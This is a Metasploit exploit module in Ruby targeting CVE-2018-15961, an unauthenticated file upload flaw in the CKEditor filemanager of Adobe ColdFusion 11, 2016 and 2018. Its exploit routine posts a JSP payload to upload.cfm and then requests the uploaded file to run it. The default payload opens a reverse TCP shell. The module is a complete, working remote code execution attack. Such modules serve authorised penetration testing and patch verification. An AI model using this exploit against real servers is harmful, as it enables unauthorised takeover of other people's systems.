##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpClient

  Rank = ExcellentRanking

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Adobe ColdFusion CKEditor unrestricted file upload',
        'Description' => %q{
          A file upload vulnerability in the CKEditor of Adobe ColdFusion 11
          (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and
          ColdFusion 2018 (July 12 release) allows unauthenticated remote
          attackers to upload and execute JSP files through the filemanager
          plugin.
          Tested on Adobe ColdFusion 2018.0.0.310739.
        },
        'Author' => [
          'Pete Freitag de Foundeo', # Vulnerability discovery
          'Vahagn vah_13 Vardanian',  # First public PoC
          'Qazeer'                    # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2018-15961' ],
          [ 'BID', '105314' ],
          [ 'URL', 'https://helpx.adobe.com/fr/security/products/coldfusion/apsb18-33.html' ]
        ],
        'Privileged' => false,
        'Targets' => [
          [
            'Java Universal',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => %w[linux win],
              'Payload' => { 'DisableNops' => true },
              'DefaultOptions' => { 'PAYLOAD' => 'java/jsp_shell_reverse_tcp' }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => { 'RPORT' => 8500 },
        'DisclosureDate' => '2018-09-11',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options [
      OptString.new('TARGETURI', [ false, 'Base application path', '/' ]),
    ]
  end

  def exploit
    filename = rand_text_alpha_upper(1..10) + '.jsp'

    print_status("Uploading the JSP payload at #{target_uri}cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/#{filename}...")

    mime = Rex::MIME::Message.new
    mime.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
    mime.add_part('path', 'text/plain', nil, 'form-data; name="path"')

    post_str = mime.to_s
    post_str.strip!

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri, 'cf_scripts', 'scripts', 'ajax', 'ckeditor', 'plugins', 'filemanager', 'upload.cfm'),
      'version' => '1.1',
      'method' => 'POST',
      'ctype' => 'multipart/form-data; boundary=' + mime.bound,
      'data' => post_str
    })

    unless res && res.code == 200
      fail_with Failure::Unknown, 'Upload Failed...'
    end

    print_good('Upload succeeded! Executing payload...')

    send_request_cgi({
      'uri' => normalize_uri(target_uri, 'cf_scripts', 'scripts', 'ajax',
                             'ckeditor', 'plugins', 'filemanager', 'uploadedFiles', filename),
      'method' => 'GET'
    }, 5)
  end
end
